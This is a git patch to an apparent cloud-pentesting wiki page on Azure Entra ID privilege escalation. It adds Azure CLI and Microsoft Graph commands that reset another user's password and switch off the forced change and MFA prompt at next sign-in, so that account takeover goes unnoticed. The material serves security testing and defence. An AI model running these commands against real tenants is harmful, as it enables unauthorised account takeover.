From cee4c979673466337d7614f2143f4b49fc6c943b Mon Sep 17 00:00:00 2001
From: ZoneMix <38586893+ZoneMix@users.noreply.github.com>
Date: Sat, 2 May 2026 17:05:49 -0500
Subject: [PATCH] Update user password update privilege escalation technique

---
 .../az-entraid-privesc/README.md                 | 16 +++++++++++++++-
 1 file changed, 15 insertions(+), 1 deletion(-)

diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
index 795ab6807..9a922b1ba 100644
--- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
+++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md
@@ -408,7 +408,21 @@ dynamic-groups.md
 This permission allows to reset password to non-admin users, allowing a potential attacker to escalate privileges to other users. This permission cannot be assigned to custom roles.
 
 ```bash
-az ad user update --id <user-id> --password "kweoifuh.234"
+# Update user password
+userId="<user-id>"
+az ad user update --id $userId --password "kweoifuh.234"
+
+# Update user password without needing to change or use MFA on next sign-in
+az rest --method PATCH \
+  --uri "https://graph.microsoft.com/v1.0/users/$userId" \
+  --headers "Content-Type=application/json" \
+  --body "{
+    \"passwordProfile\": {
+      \"forceChangePasswordNextSignInWithMfa\": false,
+      \"forceChangePasswordNextSignIn\": false,
+      \"password\": \"kweoifuh.234\"
+    }
+  }"
 ```
 
 ### `microsoft.directory/users/basic/update`